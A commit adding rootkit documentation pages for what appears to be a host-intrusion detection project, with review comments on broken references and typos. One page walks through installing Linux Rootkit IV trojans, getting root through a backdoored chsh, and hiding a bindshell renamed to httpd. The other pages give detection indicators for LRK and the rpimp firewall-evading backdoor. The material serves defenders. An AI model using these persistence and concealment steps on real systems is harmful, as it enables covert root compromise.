Commits

Jeremy Rossi  committed 3f49925 Merge
  • Parent commits d451a01, 04c2d65
  • Branches default

Files changed (4)

File docs/rootcheck/analysis-lrk5.rst

+
+.. _analysis-lrk:
+
+
+Analysis of a rootkit: Linux Rootkit
+====================================
+
+
+Linux Rootkit IV
+by Lord Somer
+
+Released November 26, 1998 
+
+Linux Rootkit IV is the newest version of a well-known trojan-package for Linux system. The 
+rootkit comes with following utility programs and trojaned system commands: bindshell, chfn, 
+chsh, crontab, du, find, fix, ifconfig, inetd, killall, linsniffer, login, ls, netstat, 
+passwd, pidof, ps, rshd, sniffchk, syslogd, tcpd, top, wted, z2 
+
+In this example I tested chsh, bindshell and ifconfig. 
+
+In the first example below, I compiled only chsh in /chsh-directory and used 'fix' to replace 
+the original with the trojan version. ::
+
+    [root@parittaja chsh]# ls -al
+    total 201
+    drwxr--r--   2 jj       jj           1024 Mar 18 02:10 .
+    drwxr-xr-x  19 jj       jj           1024 Mar 18 02:09 ..
+    -rw-------   1 jj       jj            109 Nov 24 06:27 Makefile
+    -rwxr-xr-x   1 root     dzeijay    185448 Mar 18 02:09 chsh
+    -rw-------   1 jj       jj           8786 Nov 24 06:27 chsh.c
+    -rw-------   1 jj       jj           5283 Nov 24 06:27 setpwnam.c
+    [root@parittaja chsh]# make
+    gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
+    -DVARPATH=\"\" chsh.c -o chsh.o
+    gcc -c -pipe -O2 -m486 -fomit-frame-pointer -I. -I -DSBINDIR=\"\" -DUSRSBINDIR=\"\" -DLOGDIR=\"\"
+    -DVARPATH=\"\" setpwnam.c -o setpwnam.o
+    gcc -s -N  chsh.o setpwnam.o   -o chsh
+    [root@parittaja chsh]# ls -al
+    total 210
+    drwxr--r--   2 jj       jj           1024 Mar 18 02:10 .
+    drwxr-xr-x  19 jj       jj           1024 Mar 18 02:09 ..
+    -rw-------   1 jj       jj            109 Nov 24 06:27 Makefile
+    -rwxr-xr-x   1 root     dzeijay    185448 Mar 18 02:10 chsh
+    -rw-------   1 jj       jj           8786 Nov 24 06:27 chsh.c
+    -rw-r--r--   1 root     dzeijay      5544 Mar 18 02:10 chsh.o
+    -rw-------   1 jj       jj           5283 Nov 24 06:27 setpwnam.c
+    -rw-r--r--   1 root     dzeijay      2488 Mar 18 02:10 setpwnam.o
+    [root@parittaja chsh]# ../fix /usr/bin/chsh ./chsh ../backup/chsh
+    fix: Last 17 bytes not zero
+    fix: Can't fix checksum
+    fix: File /usr/bin/chsh fixed
+    [root@parittaja chsh]# ls -al /usr/bin/chsh
+    -rwsr-xr-x   1 root     root       185448 Mar 18 02:08 /usr/bin/chsh
+    [root@parittaja chsh]# ls -al ../backup/chsh
+    -rwsr-xr-x   1 root     dzeijay      9620 Mar 18 02:11 ../backup/chsh
+    [root@parittaja chsh]#
+
+As can be noticed, the fixing wasn't all that successful, and the trojaned program would easily 
+be caught because of it's huge size.  Later on, it is easy to get a root shell by typing the 
+specific password. ::
+
+    [jj@rikas jj]$ id
+    uid=511(jj) gid=530(jj) groups=530(jj)
+    [jj@rikas jj]$ chsh
+    Changing shell for jj.
+    New shell [/bin/tcsh]: satori
+    [root@rikas jj]# id
+    uid=0(root) gid=0(root) groups=530(jj)
+    [root@rikas jj]# exit
+    exit
+    [jj@rikas jj]$
+
+A problem with chsh (and chfn) is that the original system commands in the newer Linux systems 
+asks for the user password before asking for a new shell etc. The trojaned versions in these 
+rootkits won't do that and are therefore easily discovered. But, it wouldn't require very 
+much to implement that, or better even to trojan the newer versions of chsh and chfn. This 
+reminds of the system specific requirements of trojan programs. A trojan coder (and user 
+naturally!) must know how the original command works exactly, otherwise they are immediately 
+caught. This limit's the portability and distribution of existing trojans to those specific 
+systems (platforms, kernel versions, distrubution and program versions etc) they were made to. 
+The second example is more sophisticated rootkit/trojan "attack" and utilizes the "bindshell" 
+program that comes in Linux Rootkit IV. Bindshell "binds" itself to a specific port and remains 
+waiting for new connections. When a connection is established (from the same computer or 
+from somewhere else), you can type commands ending with a semicolon, and the bindshell 
+executes them in the system with root-priviledges (if binded as root). Very handy. 
+
+In the example below, bindshell is first compiled and right owners are set. Then I renamed 
+it to 'httpd' to make it harder to notice and finally put it running in the background. 
+It would be wise to pick a process-name that is widely used in the system and relatively 
+small (of course you could do the bindshell program exactly as big as some specific process) 
+to make it as transparent as possible. These run-time programs are harder to track in large 
+systems where there are lots of user processes running. ::
+
+    [root@parittaja lrk4]# make bindshell
+    gcc -O2 -fomit-frame-pointer -pipe -I/usr/include/bsd -include /usr/include/bsd/bsd.h
+    bindshell.c  -lbsd -o bindshell
+    [root@parittaja lrk4]# chown root.root bindshell
+    [root@parittaja lrk4]# mv bindshell httpd
+    [root@parittaja lrk4]# ls -al httpd
+    -rwxr-xr-x   1 root     root         5339 Mar 18 02:36 httpd
+    [root@parittaja lrk4]# httpd
+    [root@parittaja lrk4]# rm httpd
+    [root@parittaja lrk4]# ps aux | grep httpd
+    nobody    1378  0.0  1.6  1168   504  ?  S  Mar 14   0:00 httpd 
+    nobody    1379  0.0  1.4  1168   436  ?  S  Mar 14   0:00 httpd 
+    nobody    1380  0.0  1.3  1168   432  ?  S  Mar 14   0:00 httpd 
+    nobody    1381  0.0  1.3  1168   416  ?  S  Mar 14   0:00 httpd 
+    nobody    1382  0.0  1.3  1168   428  ?  S  Mar 14   0:00 httpd 
+    root       319  0.0  1.1  1168   356  ?  S  Jan  5   0:00 httpd 
+    root     18281  0.0  0.7   856   224  ?  S   02:33   0:00 httpd 
+    root     18518  0.0  1.1   968   340  p4 S   02:37   0:00 grep httpd 
+    [root@parittaja lrk4]# 
+
+Now when the process is running, I can contact the victim computer from any other computer 
+with telnet or likes and do what I wish with root-priviledges. Notice, that I don't even 
+need a user account on the target machine - there's no login! ::
+
+    [jj@rikas jj]$ telnet parittaja 31337
+    Trying 10.0.0.61...
+    Connected to parittaja.sec.
+    Escape character is '^]'.
+    ls -al /root/private.txt;
+    -rw-r--r--   1 root     root            0 Mar 18 02:30 /root/private.txt
+    : command not found
+    rm -f /root/private.txt;
+    : command not found
+    ls -al /root/private.txt;
+    ls: /root/private.txt: No such file or directory
+    : command not found
+    exit;
+    Connection closed by foreign host.
+    [jj@rikas jj]$ 
+
+As an example of those not-rootshell-giving-programs, let's take a look at 'ifconfig'. Ifconfig 
+is a general interface configuration tool for many purposes. You can set up your interface or 
+check it's current status. One classical feature of ifconfig is that it shows you if an 
+ethernet network card attached to the system is in so called 'promiscous mode'. That would 
+indicate, that somebody is sniffering the net-traffic flowing by the card. If the 
+sniffering is of malicious intension, it would be preferrable to do it in silence. 
+One solution is to trojan ifconfig. ::
+
+    [root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
+    lo        Link encap:Local Loopback  
+              inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
+              UP BROADCAST LOOPBACK RUNNING  MTU:3584  Metric:1
+              RX packets:38794 errors:0 dropped:0 overruns:0 frame:0
+              TX packets:38794 errors:0 dropped:0 overruns:0 carrier:0
+              collisions:0 
+
+    eth0      Link encap:Ethernet  HWaddr 00:10:5A:3B:3C:0E  
+              inet addr:10.0.0.81  Bcast:10.0.0.255  Mask:255.255.255.0
+              UP BROADCAST RUNNING PROMISC MULTICAST  MTU:1500  Metric:1
+              RX packets:3464563 errors:0 dropped:0 overruns:0 frame:0
+              TX packets:260648 errors:0 dropped:0 overruns:0 carrier:12
+              collisions:3099 
+              Interrupt:10 Base address:0xb800 
+
+    [root@rikas net-tools-1.32-alpha]# 
+
+Ifconfig shows that the ethernet is running in promiscous mode. So let's replace it with a trojaned 
+version (compiled earlier, comes with Linux Rootkit IV). ::
+
+    [root@rikas net-tools-1.32-alpha]# ../fix /sbin/ifconfig ./ifconfig ../backup/ifconfig
+    fix: Last 17 bytes not zero
+    fix: Can't fix checksum
+    fix: File /sbin/ifconfig fixed
+    [root@rikas net-tools-1.32-alpha]# ls -al /sbin/ifconfig
+    -rwxr-xr-x   1 root     root        19840 maalis 17 23:33 /sbin/ifconfig
+    [root@rikas net-tools-1.32-alpha]# ls -al ../backup/ifconfig
+    -rwxr-xr-x   1 root     dzeijay     25596 maalis 18 03:19 ../backup/ifconfig
+    [root@rikas net-tools-1.32-alpha]#
+
+Now let's check again... ::
+
+    [root@rikas net-tools-1.32-alpha]# /sbin/ifconfig
+    lo        Link encap:Local Loopback  
+              inet addr:127.0.0.1  Bcast:127.255.255.255  Mask:255.0.0.0
+              UP BROADCAST LOOPBACK RUNNING  MTU:3584  Metric:1
+              RX packets:38795 errors:0 dropped:0 overruns:0
+              TX packets:38795 errors:0 dropped:0 overruns:0
+
+    eth0      Link encap:10Mbps Ethernet  HWaddr 00:10:5A:3B:3C:0E
+              inet addr:10.0.0.81  Bcast:10.0.0.255  Mask:255.255.255.0
+              UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
+              RX packets:3464854 errors:0 dropped:0 overruns:0
+              TX packets:260910 errors:0 dropped:0 overruns:0
+              Interrupt:10 Base address:0xb800 
+
+    [root@rikas net-tools-1.32-alpha]# 
+
+...and the 'PROMISC' is gone. 
+Linux Rootkit IV compiles fine on an old RedHat 4.2 (libc5), but requires modifications for newer systems. 
+
+Fear...your system may be trojaned... 
+
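Review bot: The label defined at the top of this file is `.. _analysis-lrk:`, but the new rootcheck-irk.rst in this same commit links to it with `:ref:`analysis-lrk5``, so Sphinx will report an undefined label and the cross-reference will not render. Either rename the label to `.. _analysis-lrk5:` (matching the file name analysis-lrk5.rst) or change the ref to `analysis-lrk`; the file name itself is also worth a second look, since the text analyses Linux Rootkit IV, not lrk5. Minor: several spellings in the body ("it's huge size", "priviledges", "promiscous", "distrubution", "limit's", "sniffering") should be corrected before this is published as project documentation.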

File docs/rootcheck/analysis-rpimp.rst

+.. analysis-rpimp::
+
+
+Analysis of a rootkit: rpimp
+============================
+
+by: Daniel B. Cid 
+to: Open Source Security
+
+
+Rpimp is an interesting backdoor. Its allows the attacker to bypass the firewall protection, 
+using some permitted port.
+
+Defition by the author (of rpimp):
+
+    Reverse Pimpage was designed to allow you to access a box that is behind a
+    firewall from outside that firewall itself.  The way it accomplishes this is
+    by having the "client", the box behind the firewall, send in certain intervals
+    a SYN request to a certain port.  The reason it does it in intervals is so that
+    some routers dont freak out that they're getting a continous stream of SYN
+    requests, and for efficiency.  Once you get home for the day you simply run the
+    "server" on your home PC and when the time interval is up it will connect.
+    Once it's connected the "client" telnets to itself and routes data back and
+    forth between the two.  It's rather efficient and the security is there.
+
+
+Usage:
+------
+
+Usage::
+
+    root@rootkit:/test/exploits/rp# ./rpimp  --help
+    ./rpimp: invalid option -- -
+    Usage: ./rpimp [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
+                    [-g gateway] [-P protocol]
+                    [-E escapechar]
+
+
+Strings (interesting parts)::
+
+    /lib/ld-linux.so.2
+    libnsl.so.1
+    connect
+    bind
+    inet_addr
+    stdin
+    strstr
+    signal
+    read
+    listen
+    fork
+    getopt
+    memset
+    cfmakeraw
+    tcgetattr
+    gethostbyname
+    stderr
+    fwrite
+    exit
+    Connection established.
+    Escape character is '%c%c'
+    -g		optional gateway
+    -v		version option.
+    127.0.0.1
+    Exiting...
+    Client suggested, but host not given.
+    Successfully forked into pid %i
+    ERROR: unable to fork, continueing...
+    FATAL: Neither server or client defined, exiting.
+    Reverse Pimpage v2.1 by: Matt Miller (warped@hick.org)
+        Bug fixes and Term Emul. by Tommy (dantar@dantar.com)
+    Usage: %s [-s] [-c] -h host [-v] [-p port] [-t timeout] [-e expectstr]
+            [-g gateway] [-P protocol]
+            [-E escapechar]
+    -s		Server option, -h not needed.
+    -c		Client option, host needed.
+    -t		timeout for client to reconnect.
+    -e		expect string to expect from gateway (will send remotehost)
+    -P		protocol to use, either telnet or none.
+    Unable to resolve %s
+    telnet
+    127.0.0.1
+
+
+Ways to detect
+--------------
+
+
+1- See with tcpdump if you have any program trying to connect to a remote
+machine on port 1040 (this port can change, but this one is the default).::
+
+    tcpdump -i eth0 tcp port 1040 
+
+    --
+    13:26:47.490302 192.168.1.107.32781 > 192.168.1.106.1040: S 3771526166:3771526166(0) win 5840 <mss 1460,sackOK,timestamp 647210 0,nop,wscale 0> (DF)
+    13:26:47.491062 192.168.1.106.1040 > 192.168.1.107.32781: R 0:0(0) ack 3771526167 win 0 (DF)
+
+
+2- Verify if you have any program rpimp running.::
+
+    ps -aux | grep rpimp
+
+    root      2493  0.0  0.1  1420  308 tty1     S    13:25   0:00 ./rpimp -c -h 192168.1.106
+
+
+3- Using lsof, look for some entries similar to that one::
+
+    rpimp     2493 root  mem    REG        3,3  672140    194066 /lib/ld-2.3.1.so
+    rpimp     2493 root  mem    REG        3,3   87653    194048 /lib/libnsl-2.3.1.so
+    rpimp     2493 root  mem    REG        3,3 1435624    194045 /lib/libc-2.3.1.so
+    rpimp     2493 root    0u   CHR        4,1             64399 /dev/tty1
+    rpimp     2493 root    1u   CHR        4,1             64399 /dev/tty1
+    rpimp     2493 root    2u   CHR        4,1             64399 /dev/tty1
+    rpimp     2493 root    3u  sock        0,0             14410 can't identify protocol
+    rpimp     2493 root    4u  sock        0,0             14604 can't identify protocol
+    rpimp     2493 root    5u  sock        0,0             14610 can't identify protocol
+    rpimp     2493 root    6u  sock        0,0             14611 can't identify protocol
+
+    rpimp     2493 root    3u  sock        0,0             14410 can't identify protocol
+
+
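Review bot: `.. analysis-rpimp::` on the first line is not a label; it is parsed as an unknown directive named `analysis-rpimp`, which fails the build, and the `:ref:`analysis-rpimp`` in rootcheck-rpimp.rst will then be unresolved. It should read `.. _analysis-rpimp:` (leading underscore, single trailing colon). Two smaller points: "Defition" should be "Definition", and the "Usage:" section heading is immediately followed by a second "Usage::" literal-block lead-in, so one of them is redundant. In the lsof sample, the final `rpimp 2493 root 3u sock 0,0 14410 can't identify protocol` line duplicates the earlier fd 3 entry and looks like a paste error; the ps sample also shows `-h 192168.1.106`, which is missing a dot and should probably be `192.168.1.106` if it is meant to match the tcpdump output above it.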

File docs/rootcheck/rootcheck-irk.rst

+
+Information about the LRK rootkit 
+===================================
+
+Information about LRK (Linux Rootkits) 
+
+More Information
+----------------
+
+The LRK is a very famous rootkit used to infect Linux systems. It have a lot of 
+versions (3,4,5) and has been in the wild since 1997 (if i am not wrong). The 
+main purpose of this rootkit is to infect some binaries of the system to hide 
+the "cracker" presence.  More info about the LRK can be found in this link: 
+:ref:`analysis-lrk5`
+
+The README file from lrk4 can be found here
+The README file from lrk5 can be found here
+
+Downloads: 
+lrk4.src c2f886c7af1e6318f79460ff0ffe4f5e 
+lrk5.src e18b708650f7dc4cca447df33d09740f 
+
+Files to search
+---------------
+
+- ``/dev/ida/.inet``
+- ``*bindshell``
+
+Ports used by LRK: 
+
+- ``37337``
+
+Binaries to search: 
+
+- ``bindshell``
+- ``chfn``
+- ``chsh``
+- ``crontab``
+- ``du``
+- ``find``
+- ``fix``
+- ``ifconfig``
+- ``inetd``
+- ``killall``
+- ``linsniffer``
+- ``login``
+- ``ls``
+- ``netstat``
+- ``passwd``
+- ``pidof``
+- ``ps``
+- ``rshd``
+- ``sniffchk``
+- ``syslogd``
+- ``tcpd``
+- ``top``
+- ``wted``
+- ``z2``
+
+
+.. note::
+    
+    All files with an "*" need to be search in all system
+
+If you have any more Information about this rootkits sent to rootkits at ossec.net 
+
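Review bot: The file is named rootcheck-irk.rst while its title and every mention in the body say LRK; this looks like a typo in the file name and will make the page hard to find alongside rootcheck-rpimp.rst. The `:ref:`analysis-lrk5`` on the "More info" line does not match the `analysis-lrk` label defined in analysis-lrk5.rst in this commit, so the link will be broken until one side is renamed. The port listed under "Ports used by LRK" is 37337, whereas the bindshell telnet transcript in analysis-lrk5.rst connects to port 31337; please verify which value is correct, since a wrong port here feeds directly into detection rules. "The README file from lrk4 can be found here" (and the lrk5 line) have no link target, so "here" points nowhere; either add the targets or drop the sentences. Minor wording: "sent to rootkits at ossec.net" should be "send them to rootkits at ossec.net", and "need to be search" should be "need to be searched for".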

File docs/rootcheck/rootcheck-rpimp.rst

+
+Information about the RPimp Rootkit 
+======================================
+
+
+More Information
+----------------
+
+Reverse Pimpage was designed to allow you to access a box that is behind a 
+firewall from outside that firewall itself. The way it accomplishes this is
+by having the "client", the box behind the firewall, send in certain 
+intervals a SYN request to a certain port. The reason it does it in 
+intervals is so that some routers dont freak out that they're getting 
+a continous stream of SYN requests, and for efficiency. Once you get 
+home for the day you simply run the "server" on your home PC and when 
+the time interval is up it will connect. 
+Once it's connected the "client" telnets to itself and routes data back and
+forth between the two. It's rather efficient and the security is there.
+
+A rpimp`s analyse, done by Daniel Cid (me), can be found in the link:
+:ref:`analysis-rpimp`
+
+Download: rpv21.tar.gz bc494b0a8cd6928710f1a50462b1d5b4 
+
+Files
+-----
+
+-- ``*rpimp``
+
+.. note::
+
+    All files with an "*" need to be search in all system
+
+If you have any more Information about this rootkits sent to rootkits at ossec.net
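Review bot: `-- ``*rpimp``` under "Files" is not a reStructuredText bullet (two dashes), so it will render as a plain paragraph rather than a list item; use `- ``*rpimp``` as the other rootcheck page does. The "More Information" paragraph reproduces the rpimp author's own description word for word, but unlike analysis-rpimp.rst it does not say so; attributing it (or indenting it as a quotation) would avoid presenting the tool author's "the security is there" as the project's assessment. Minor: "A rpimp`s analyse" uses a backtick for an apostrophe and should read "An analysis of rpimp", and the closing sentence has the same "sent to" / "need to be search" wording issues as rootcheck-irk.rst.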